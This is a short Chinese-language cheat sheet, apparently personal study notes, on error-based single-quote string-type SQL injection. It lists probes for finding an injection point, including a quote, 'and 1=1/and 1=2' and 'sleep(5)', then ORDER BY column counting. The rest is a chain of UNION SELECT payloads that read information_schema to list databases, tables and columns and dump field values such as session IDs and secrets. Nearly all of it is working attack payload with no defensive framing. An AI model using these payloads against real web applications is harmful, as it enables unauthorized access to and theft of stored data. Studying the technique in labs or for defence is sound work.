sql注入基于错误-单引号-字符型

查找注入点

在url中：

1. '

2. and 1=1/and 1=2

3. 随即输入（整形）

4. -1/+1回显上下页面（整形）

5. and sleep（5） （判断页面返回时间）

判断有多少列

order by .....

爆显示位：

id=88888888') union select 1,2,3 --+

先获取数据库：

id=')  union select 1,2,group_concat(distinct+table_schema) from information_schema.columns  --+

再获取数据库的所有表:

id=') union select 1,2,group_concat(distinct+table_name) from information_schema.columns where table_schema='库名' --+

再获取表中的字段:

id=')  union select 1,2,group_concat(distinct+column_name) from information_schema. columns where table_name='表名' --+

再获取字段信息：

id=')  union select 1,2,group_concat(id,sessid,secret_EXS6,tryy) from 库名.表名--+